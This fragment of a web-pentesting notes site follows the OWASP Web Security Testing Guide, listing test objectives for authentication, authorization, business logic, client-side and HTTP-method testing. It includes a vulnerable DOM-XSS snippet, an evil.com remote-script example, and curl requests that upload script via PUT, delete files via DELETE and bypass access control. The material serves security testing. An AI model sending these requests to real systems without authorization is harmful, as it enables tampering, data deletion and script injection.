        ID Link to Hackinglife Link to OWASP Description 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking.","tags":["web pentesting","WSTG-ATHN-03"]},{"location":"OWASP/WSTG-ATHN-04/","title":"Testing for Bypassing Authentication Schema","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.4. Testing for Bypassing Authentication Schema

        ID Link to Hackinglife Link to OWASP Description 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection","tags":["web pentesting","WSTG-ATHN-04"]},{"location":"OWASP/WSTG-ATHN-05/","title":"Testing for Vulnerable Remember Password","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.5. Testing for Vulnerable Remember Password

        ID Link to Hackinglife Link to OWASP Description 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and do not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?","tags":["web pentesting","WSTG-ATHN-05"]},{"location":"OWASP/WSTG-ATHN-06/","title":"Testing for Browser Cache Weaknesses","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.6. Testing for Browser Cache Weaknesses

        ID Link to Hackinglife Link to OWASP Description 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: nocache)","tags":["web pentesting","WSTG-ATHN-06"]},{"location":"OWASP/WSTG-ATHN-07/","title":"Testing for Weak Password Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.7. Testing for Weak Password Policy

        ID Link to Hackinglife Link to OWASP Description 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute Force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords.","tags":["web pentesting","WSTG-ATHN-07"]},{"location":"OWASP/WSTG-ATHN-08/","title":"Testing for Weak Security Question Answer","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.8. Testing for Weak Security Question Answer

        ID Link to Hackinglife Link to OWASP Description 4.8 WSTG-ATHN-08 Testing for Weak Security Question Answer - Determine the complexity and how straight-forward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities.","tags":["web pentesting","WSTG-ATHN-08"]},{"location":"OWASP/WSTG-ATHN-09/","title":"Testing for Weak Password Change or Reset Functionalities","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.9. Testing for Weak Password Change or Reset Functionalities

        ID Link to Hackinglife Link to OWASP Description 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?) - Test password change (Need old password?)","tags":["web pentesting","WSTG-ATHN-09"]},{"location":"OWASP/WSTG-ATHN-10/","title":"Testing for Weaker Authentication in Alternative Channel","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.10. Testing for Weaker Authentication in Alternative Channel

        ID Link to Hackinglife Link to OWASP Description 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exists on the alternative channels.","tags":["web pentesting","WSTG-ATHN-10"]},{"location":"OWASP/WSTG-ATHN-11/","title":"Testing Multi-Factor Authentication (MFA)","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.11. Testing Multi-Factor Authentication (MFA)

        ID Link to Hackinglife Link to OWASP Description 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["web pentesting","WSTG-ATHN-11"]},{"location":"OWASP/WSTG-ATHZ-01/","title":"Testing Directory Traversal File Include","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-01/#see-my-notes","title":"See my notes","text":"

        See my notes on Local File Inclusion

        See my notes on Remote File Inclusion

        ","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-02/","title":"Testing for Bypassing Authorization Schema","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

        ID Link to Hackinglife Link to OWASP Description 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser)","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-02/#see-my-notes","title":"See my notes","text":"
        • Broken access control: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
        ","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-03/","title":"Testing for Privilege Escalation","text":"

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.3. Testing for Privilege Escalation

        ID Link to Hackinglife Link to OWASP Description 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures.","tags":["web pentesting","WSTG-ATHZ-03"]},{"location":"OWASP/WSTG-ATHZ-04/","title":"Testing for Insecure Direct Object References","text":"

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.4. Testing for Insecure Direct Object References

        ID Link to Hackinglife Link to OWASP Description 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456)","tags":["web pentesting","WSTG-ATHZ-04"]},{"location":"OWASP/WSTG-ATHZ-05/","title":"Testing for OAuth Weaknesses","text":"

        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.5. Testing for OAuth Weaknesses

        ID Link to Hackinglife Link to OWASP Description 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["web pentesting","WSTG-ATHZ-05"]},{"location":"OWASP/WSTG-BUSL-01/","title":"Test Business Logic Data Validation","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.1. Test Business Logic Data Validation

        ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it.","tags":["web pentesting","WSTG-BUSL-01"]},{"location":"OWASP/WSTG-BUSL-02/","title":"Test Ability to Forge Requests","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.2. Test Ability to Forge Requests

        ID Link to Hackinglife Link to OWASP Description 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow.","tags":["web pentesting","WSTG-BUSL-02"]},{"location":"OWASP/WSTG-BUSL-03/","title":"Test Integrity Checks","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.3. Test Integrity Checks

        ID Link to Hackinglife Link to OWASP Description 10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. - Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow.","tags":["web pentesting","WSTG-BUSL-03"]},{"location":"OWASP/WSTG-BUSL-04/","title":"Test for Process Timing","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.4. Test for Process Timing

        ID Link to Hackinglife Link to OWASP Description 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing (Race Condition).","tags":["web pentesting","WSTG-BUSL-04"]},{"location":"OWASP/WSTG-BUSL-05/","title":"Test Number of Times a Function Can Be Used Limits","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.5. Test Number of Times a Function Can Be Used Limits

        ID Link to Hackinglife Link to OWASP Description 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.","tags":["web pentesting","WSTG-BUSL-05"]},{"location":"OWASP/WSTG-BUSL-06/","title":"Testing for the Circumvention of Work Flows","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.6. Testing for the Circumvention of Work Flows

        ID Link to Hackinglife Link to OWASP Description 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified.","tags":["web pentesting","WSTG-BUSL-06"]},{"location":"OWASP/WSTG-BUSL-07/","title":"Test Defenses Against Application Misuse","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.7. Test Defenses Against Application Misuse

        ID Link to Hackinglife Link to OWASP Description 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account","tags":["web pentesting","WSTG-BUSL-07"]},{"location":"OWASP/WSTG-BUSL-08/","title":"Test Upload of Unexpected File Types","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

        ID Link to Hackinglife Link to OWASP Description 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures.","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-08/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

        See my notes on Arbitrary File Upload

        ","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-09/","title":"Test Upload of Malicious Files","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.9. Test Upload of Malicious Files

        ID Link to Hackinglife Link to OWASP Description 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed.","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-09/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

        See my notes on Arbitrary File Upload

        ","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-10/","title":"Test Payment Functionality","text":"

        OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.10. Test Payment Functionality

        ID Link to Hackinglife Link to OWASP Description 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["web pentesting","WSTG-BUSL-10"]},{"location":"OWASP/WSTG-CLNT-01/","title":"Testing for DOM-Based Cross Site Scripting","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.1. Testing for DOM-Based Cross Site Scripting

        ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

        The key to exploiting this XSS flaw is that client-side script code can access the browser's DOM, and thus all the information available in it: the URL, history, cookies, local storage, and so on. Technically, two keywords matter here: sources and sinks. Let's use the following vulnerable code:

        ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#causes","title":"Causes","text":"

        This vulnerable code in a welcome page may lead to a DOM XSS attack when the page is visited with a URL like: http://example.com/#w!Giuseppe

        <h1 id='welcome'></h1>\n<script>\n    var w = \"Welcome \";\n    // Take everything after the \"#w!\" marker in the URL fragment (untrusted input)\n    var name = document.location.hash.substring(\n                document.location.hash.search(/#w!/i) + 3,\n                document.location.hash.length\n                );\n    document.getElementById('welcome').innerHTML = w + name;\n</script>\n

        location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.

        To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the window.location object.

        What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the eval() function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is document.body.innerHTML because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.

        Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.
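
        As a minimal sketch of the safer pattern (reusing the hypothetical welcome-page example above), write untrusted fragment data with textContent, so the browser renders it as plain text instead of parsing it as HTML:

        var name = document.location.hash.substring(3);  // still untrusted input\ndocument.getElementById('welcome').textContent = 'Welcome ' + name;  // rendered as text, not markup\n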

        Which sinks can lead to DOM-XSS vulnerabilities:

        • document.write()
        • document.writeln()
        • document.domain
        • element.innerHTML
        • element.outerHTML
        • element.insertAdjacentHTML
        • element.onevent

        The DOMXSS Wiki project aims to identify source and sink methods exposed by public, widely used JavaScript frameworks.

        ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#attack-techniques","title":"Attack techniques","text":"

        Go to my XSS cheat sheet

        ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-02/","title":"Testing for JavaScript Execution","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.2. Testing for JavaScript Execution

        ID Link to Hackinglife Link to OWASP Description 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points.","tags":["web pentesting","WSTG-CLNT-02"]},{"location":"OWASP/WSTG-CLNT-03/","title":"Testing for HTML Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.3. Testing for HTML Injection

        ID Link to Hackinglife Link to OWASP Description 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user=","tags":["web pentesting","WSTG-CLNT-03"]},{"location":"OWASP/WSTG-CLNT-04/","title":"Testing for Client-side URL Redirect","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.4. Testing for Client-side URL Redirect

        ID Link to Hackinglife Link to OWASP Description 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site","tags":["web pentesting","WSTG-CLNT-04"]},{"location":"OWASP/WSTG-CLNT-05/","title":"Testing for CSS Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.5. Testing for CSS Injection

        ID Link to Hackinglife Link to OWASP Description 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection.","tags":["web pentesting","WSTG-CLNT-05"]},{"location":"OWASP/WSTG-CLNT-06/","title":"Testing for Client-side Resource Manipulation","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.6. Testing for Client-side Resource Manipulation

        ID Link to Hackinglife Link to OWASP Description 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js","tags":["web pentesting","WSTG-CLNT-06"]},{"location":"OWASP/WSTG-CLNT-07/","title":"Testing Cross Origin Resource Sharing","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.7. Testing Cross Origin Resource Sharing

        ID Link to Hackinglife Link to OWASP Description 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless.","tags":["web pentesting","WSTG-CLNT-07"]},{"location":"OWASP/WSTG-CLNT-08/","title":"Testing for Cross Site Flashing","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.8. Testing for Cross Site Flashing

        ID Link to Hackinglife Link to OWASP Description 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sinks inputs and unsafe method usages. For example: file.swf?lang=http://evil","tags":["web pentesting","WSTG-CLNT-08"]},{"location":"OWASP/WSTG-CLNT-09/","title":"Testing for Clickjacking","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.9. Testing for Clickjacking

        ID Link to Hackinglife Link to OWASP Description 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading it into an iframe: create a simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable.","tags":["web pentesting","WSTG-CLNT-09"]},{"location":"OWASP/WSTG-CLNT-10/","title":"Testing WebSockets","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.10. Testing WebSockets

        ID Link to Hackinglife Link to OWASP Description 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels.","tags":["web pentesting","WSTG-CLNT-10"]},{"location":"OWASP/WSTG-CLNT-11/","title":"Testing Web Messaging","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.11. Testing Web Messaging

        ID Link to Hackinglife Link to OWASP Description 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it's using safe methods and validating its input.","tags":["web pentesting","WSTG-CLNT-11"]},{"location":"OWASP/WSTG-CLNT-12/","title":"Testing Browser Storage","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.12. Testing Browser Storage

        ID Link to Hackinglife Link to OWASP Description 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries.","tags":["web pentesting","WSTG-CLNT-12"]},{"location":"OWASP/WSTG-CLNT-13/","title":"Testing for Cross Site Script Inclusion","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.13. Testing for Cross Site Script Inclusion

        ID Link to Hackinglife Link to OWASP Description 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques.","tags":["web pentesting","WSTG-CLNT-13"]},{"location":"OWASP/WSTG-CLNT-14/","title":"Testing for Reverse Tabnabbing","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.14. Testing for Reverse Tabnabbing

        ID Link to Hackinglife Link to OWASP Description 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["web pentesting","WSTG-CLNT-14"]},{"location":"OWASP/WSTG-CONF-01/","title":"Test Network Infrastructure Configuration","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.1. Test Network Infrastructure Configuration

        ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.","tags":["web pentesting","reconnaissance","WSTG-CONF-01","dorkings"]},{"location":"OWASP/WSTG-CONF-02/","title":"Test Application Platform Configuration","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.2. Test Application Platform Configuration

        ID Link to Hackinglife Link to OWASP Description 2.2 WSTG-CONF-02 Test Application Platform Configuration - Ensure that defaults and known files have been removed. - Review configuration and server handling (40x, 50x) - Validate that no debugging code or extensions are left in the production environments. - Review the logging mechanisms set in place for the application including Log Location, Log Storage, Log Rotation, Log Access Control, Log Review","tags":["web pentesting","reconnaissance","WSTG-CONF-02"]},{"location":"OWASP/WSTG-CONF-03/","title":"Test File Extensions Handling for Sensitive Information","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.3. Test File Extensions Handling for Sensitive Information

        ID Link to Hackinglife Link to OWASP Description 2.3 WSTG-CONF-03 Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) - Validate that no system framework bypasses exist on the rules set.","tags":["web pentesting","reconnaissance","WSTG-CONF-03"]},{"location":"OWASP/WSTG-CONF-04/","title":"Review Old Backup and Unreferenced Files for Sensitive Information","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.4. Review Old Backup and Unreferenced Files for Sensitive Information

        ID Link to Hackinglife Link to OWASP Description 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename","tags":["web pentesting","reconnaissance","WSTG-CONF-04"]},{"location":"OWASP/WSTG-CONF-05/","title":"Enumerate Infrastructure and Application Admin Interfaces","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.5. Enumerate Infrastructure and Application Admin Interfaces

        ID Link to Hackinglife Link to OWASP Description 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)","tags":["web pentesting","reconnaissance","WSTG-CONF-05"]},{"location":"OWASP/WSTG-CONF-06/","title":"Test HTTP Methods","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.6. Test HTTP Methods

        ID Link to Hackinglife Link to OWASP Description 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques.

        HTTP method tampering, also known as HTTP verb tampering, is a security vulnerability in which an attacker modifies the HTTP method of a request to trick the web application into performing unintended actions.

        More about HTTP methods.

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#test-objectives","title":"Test Objectives","text":"
        • Enumerate supported HTTP methods.
        • Test for access control bypass.
        • Test HTTP method overriding techniques.

        Enumerate with OPTIONS:

        curl -v -X OPTIONS <target>\n

        Test access control bypass with a made-up method:

        curl -v -X FAKEMETHOD <target>\n

        Or test access control bypass with other methods.
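
        A simple loop (a sketch; swap in the real target URL) makes it easy to compare how the server answers each verb:

        for m in GET HEAD POST PUT DELETE FOO; do code=$(curl -s -o /dev/null -w '%{http_code}' -X $m http://example.org/); echo \"$m -> $code\"; done\n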

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#put","title":"PUT","text":"

        After enumerating methods with Burpsuite:

        OPTIONS /uploads HTTP/1.1\nHost: example.org\n

        We obtained as response:

        HTTP/1.1 200 OK\nDate: ....\n....\nAllow: OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE,PROPPATCH,COPY,MOVE,LOCK\n

        Then, we can try to upload a file by using Burpsuite. Typical payload:

        PUT /test.html HTTP/1.1\nHost: example.org\nContent-Length: 25\n\n<script>alert(1)</script>\n

        Try to upload a file by using curl. Typical payload:

        curl https://example.org --upload-file test.html\ncurl -X PUT https://example.org/test.html -d \"<script>alert(1)</script>\"\n
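
        You can then request the uploaded file to confirm it was stored and is served back (a sketch; same path as above):

        curl -i https://example.org/test.html\n# A 200 response containing the payload confirms the PUT succeeded\n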
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#delete","title":"DELETE","text":"

        Try to delete a file by using Burpsuite. Typical payload:

        DELETE /uploads/file1.pdf HTTP/1.1\nHost: example.org\n

        Try to delete a file by using curl. Typical payload:

        curl -X DELETE https://example.org/uploads/file1.pdf\n
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#trace","title":"TRACE","text":"

        The TRACE method (or Microsoft's equivalent TRACK method) causes the server to echo back the contents of the request. This led to a vulnerability called Cross-Site Tracing (XST), which could be used to access cookies that had the HttpOnly flag set. The TRACE method has been blocked in all browsers and plugins for many years, so this issue is no longer exploitable. However, it may still be flagged by automated scanning tools, and the TRACE method being enabled on a web server suggests that it has not been properly hardened.
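
        To check whether TRACE is enabled, send a TRACE request and look for the request headers echoed back in the response body (target is illustrative):

        curl -v -X TRACE http://example.org/\n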

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#connect","title":"CONNECT","text":"

        The CONNECT method causes the web server to open a TCP connection to another system, and then pass traffic from the client to that system. This could allow an attacker to proxy traffic through the server in order to hide their source address, access internal systems, or access services that are bound to localhost. An example of a CONNECT request is shown below:

        CONNECT 192.168.0.1:443 HTTP/1.1\nHost: example.org\n
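
        A quick way to test this with curl is to treat the target web server as an HTTP proxy (addresses are illustrative); if the internal host answers, the server is forwarding CONNECT traffic:

        curl -v -x http://example.org:80 https://192.168.0.1/\n# curl issues a CONNECT 192.168.0.1:443 request through example.org\n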
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-access-control-bypass","title":"Testing for Access Control Bypass","text":"

        If a page on the application redirects users to a login page with a 302 code when they attempt to access it directly, it may be possible to bypass this by making a request with a different HTTP method, such as HEAD, POST, or even a made-up method such as FOO. If the web application responds with an HTTP/1.1 200 OK rather than the expected HTTP/1.1 302 Found, it may then be possible to bypass the authentication or authorization.

        HEAD /admin/ HTTP/1.1\nHost: example.org\n
        HTTP/1.1 200 OK\n[...]\nSet-Cookie: adminSessionCookie=[...];\n
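
        The same check is easy to script with curl (a sketch; the admin path is illustrative):

        curl -i -X FOO http://example.org/admin/\n# A 200 OK instead of the expected 302 redirect suggests the access control can be bypassed\n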
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-http-method-overriding","title":"Testing for HTTP Method Overriding","text":"

        Some web frameworks provide a way to override the actual HTTP method in the request. They achieve this by emulating the missing HTTP verbs and passing some custom headers in the requests. For example:

        • X-HTTP-Method
        • X-HTTP-Method-Override
        • X-Method-Override

        To test this, consider scenarios where restricted verbs like PUT or DELETE return a 405 Method Not Allowed. In such cases, replay the same request, but add the alternative headers for HTTP method overriding.
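
        For example (a sketch, assuming the framework honors override headers):

        # Direct DELETE is rejected with 405\ncurl -i -X DELETE http://example.org/resource/1\n\n# Replay as POST with an override header\ncurl -i -X POST http://example.org/resource/1 -H 'X-HTTP-Method-Override: DELETE'\n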

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-07/","title":"Test HTTP Strict Transport Security","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.7. Test HTTP Strict Transport Security

        ID Link to Hackinglife Link to OWASP Description 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ | grep -i strict","tags":["web pentesting","reconnaissance","WSTG-CONF-07"]},{"location":"OWASP/WSTG-CONF-08/","title":"Test RIA Cross Domain Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.8. Test RIA Cross Domain Policy

        ID Link to Hackinglife Link to OWASP Description 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.","tags":["web pentesting","reconnaissance","WSTG-CONF-08"]},{"location":"OWASP/WSTG-CONF-09/","title":"Test File Permission","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.9. Test File Permission

